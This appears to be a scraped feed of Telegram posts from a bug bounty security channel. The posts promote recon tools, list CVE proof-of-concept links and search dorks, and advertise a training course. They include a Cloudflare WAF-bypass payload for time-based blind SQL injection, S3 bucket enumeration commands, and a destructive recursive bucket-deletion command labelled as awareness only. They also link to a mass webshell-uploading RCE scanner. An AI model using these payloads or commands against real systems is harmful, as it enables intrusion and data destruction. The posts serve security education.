βΆοΈ It's LIVE!
πSubWatch β your next favorite tool for automated VPS subdomain monitoring! π
β Supported On VPS
β Runs every 6 hours
β Sends newly found subdomains directly to your Discord
β Includes .txt file + message alerts
β Perfect for bug bounty hunters & recon workflows
π½οΈ Watch the YouTube video & get started now:
π https://youtu.be/BkpSQKSTFUI
π₯ Download & Readme on GitHub:
π https://github.com/Brut-Security/SubWatch
π§ Powered by: subfinder, anew, jq, notify
Built with π by Brut Security
β€οΈ Give it a try, share it with your team, and drop your reactions below!
πSubWatch β your next favorite tool for automated VPS subdomain monitoring! π
β Supported On VPS
β Runs every 6 hours
β Sends newly found subdomains directly to your Discord
β Includes .txt file + message alerts
β Perfect for bug bounty hunters & recon workflows
π½οΈ Watch the YouTube video & get started now:
π https://youtu.be/BkpSQKSTFUI
π₯ Download & Readme on GitHub:
π https://github.com/Brut-Security/SubWatch
π§ Powered by: subfinder, anew, jq, notify
Built with π by Brut Security
β€οΈ Give it a try, share it with your team, and drop your reactions below!
YouTube
π¨ New Subdomain Monitoring Tool for Bug Bounty Hunters! | Brut Security
π‘οΈ Introducing SubWatch: Automated Subdomain Monitoring Script by Brut Security
Stay one step ahead in your recon game!
This tool continuously monitors your target domains for new subdomains using subfinder, stores historical data, and sends alerts directlyβ¦
Stay one step ahead in your recon game!
This tool continuously monitors your target domains for new subdomains using subfinder, stores historical data, and sends alerts directlyβ¦
β€15
π¨CVE-2025-5777 (CitrixBleed 2) - Critical memory leak vulnerability affecting Citrix NetScaler ADC and Gateway devices
π―Severity: CRITICAL β οΈ
β PoC: https://github.com/win3zz/CVE-2025-5777
π―Severity: CRITICAL β οΈ
β PoC: https://github.com/win3zz/CVE-2025-5777
β€3π₯3
CVE-2025-49704: Code Injection in Microsoft SharePoint, 8.8 ratingβοΈ
The vulnerability allows an authenticated attacker to execute code over the network.
Search at Netlas.io:
π Link: https://nt.ls/1egrVπ Dork: http.headers.microsoftsharepointteamservices:*
Vendor's advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49704
The vulnerability allows an authenticated attacker to execute code over the network.
Search at Netlas.io:
π Link: https://nt.ls/1egrVπ Dork: http.headers.microsoftsharepointteamservices:*
Vendor's advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49704
β€4
π¨ Bug Bounty Tip: Takeover Vulnerable S3 Buckets in Under a Minute! βοΈ
Want to identify exposed Amazon S3 buckets linked to a target? Here's a quick method:
π Then check for public S3 buckets:
π If the bucket name isnβt obvious:
β οΈ Found a vulnerable bucket? Donβt delete anything!
β Always report responsibly. Never exploit β you're here to help, not harm.
β‘οΈ Happy Hunting!
Want to identify exposed Amazon S3 buckets linked to a target? Here's a quick method:
echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon
π Then check for public S3 buckets:
aws s3 ls s3://REDACTEDCOM.s3.amazonaws.com
π If the bucket name isnβt obvious:
echo REDACTED.COM | cariddi -e -s -info
β οΈ Found a vulnerable bucket? Donβt delete anything!
# Do NOT run this. Just for awareness:
aws s3 rm s3://REDACTEDCOM.s3.amazonaws.com --recursive
β Always report responsibly. Never exploit β you're here to help, not harm.
β‘οΈ Happy Hunting!
β€11π7π₯4πΏ2
π‘οΈ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
β Bypass Payload
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
β Credit: @nav1n0x
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
(select(0)from(select(sleep(10)))v) β 403 Forbidden
β Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
β Credit: @nav1n0x
β€35π5πΏ4π1
β‘SSTImap - Automatic SSTI detection tool with interactive interface
β https://github.com/vladko312/SSTImap
β https://github.com/vladko312/SSTImap
β€11π3
Tired of switching tabs for OSINT and recon? Just join our Discord and type sudo help to unlock powerful tools in seconds!
β IP & Domain Lookup
β Email & Phone OSINT
β Subdomain Enumeration
β Reverse Image Search
β URL & Virus Scanners
β Temp Email, QR Tools, and more
π You can create and play your own CTF in a minute , right inside Discord!
Try it out now β itβs fast, simple, and all in one chat.
π https://discord.gg/u7uMFV833h
#ctf #bugbounty #osint #cybersecurity #discordtools #infosec
β IP & Domain Lookup
β Email & Phone OSINT
β Subdomain Enumeration
β Reverse Image Search
β URL & Virus Scanners
β Temp Email, QR Tools, and more
π You can create and play your own CTF in a minute , right inside Discord!
Try it out now β itβs fast, simple, and all in one chat.
π https://discord.gg/u7uMFV833h
#ctf #bugbounty #osint #cybersecurity #discordtools #infosec
1π«‘8β€4
π¨A comprehensive bug bounty methodology compiled from extensive research, covering web application reconnaissance, checklists, and methods for identifying various bugs. This guide aims to help bug hunters improve their skills in finding, verifying, and responsibly reporting security vulnerabilities.
β Download: https://github.com/alihussainzada/BugHunterMethodology/
β Download: https://github.com/alihussainzada/BugHunterMethodology/
β€11π4
β‘CloakQuest3r - Uncover the true IP address of websites safeguarded by Cloudflare & Others
β https://github.com/spyboy-productions/CloakQuest3r
β https://github.com/spyboy-productions/CloakQuest3r
β€22
This media is not supported in your browser
VIEW IN TELEGRAM
β‘Scanning github repos is a great way to find juicy information, secrets and credentials!
Trufflehog makes this easy.
With one scan you can find AWS keys, FTP creds, crypto keys and more!
β Check this out - https://github.com/trufflesecurity/trufflehog
Trufflehog makes this easy.
With one scan you can find AWS keys, FTP creds, crypto keys and more!
β Check this out - https://github.com/trufflesecurity/trufflehog
β€24π₯7π2
π¨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
β https://github.com/ill-deed/CVE-2025-34085-Multi-target
β https://github.com/ill-deed/CVE-2025-34085-Multi-target
π6β€4
π¨ CVE-2025-47812: Wing FTP Server Remote Code Execution (RCE) vulnerability
π₯PoC : https://github.com/4m3rr0r/CVE-2025-47812-poc
πDorks:
HUNTER: http://product.name="Wing FTP Server"
π₯PoC : https://github.com/4m3rr0r/CVE-2025-47812-poc
πDorks:
HUNTER: http://product.name="Wing FTP Server"
π₯11β€4π4
π¨ New Batch Starting β August 2025 π¨
Brut Practical Web Penetration Testing (bPWP)
Weβre back with a fresh batch of our most in-demand training β Brut Practical Web Penetration Testing β starting this August!
π Learn the art of Web Hacking with:
β 100% Practical Sessions
β Bug Bounty Approach
β Real-World Lab Scenarios
β Lifetime Community Access
β Beginner-Friendly with Advanced Techniques
π» Ideal for aspiring bug bounty hunters, cybersecurity students, and VAPT professionals.
π Limited Seats β Enroll Now
π https://brutsec.com/bPWP
π© For Queries:
Telegram: @wtf_brut
WhatsApp: https://wa.link/brutsecurity |
Email: info@brutsec.com
Brut Practical Web Penetration Testing (bPWP)
Weβre back with a fresh batch of our most in-demand training β Brut Practical Web Penetration Testing β starting this August!
π Learn the art of Web Hacking with:
β 100% Practical Sessions
β Bug Bounty Approach
β Real-World Lab Scenarios
β Lifetime Community Access
β Beginner-Friendly with Advanced Techniques
π» Ideal for aspiring bug bounty hunters, cybersecurity students, and VAPT professionals.
π Limited Seats β Enroll Now
π https://brutsec.com/bPWP
π© For Queries:
Telegram: @wtf_brut
WhatsApp: https://wa.link/brutsecurity |
+918945971332Email: info@brutsec.com
β€9π’2π1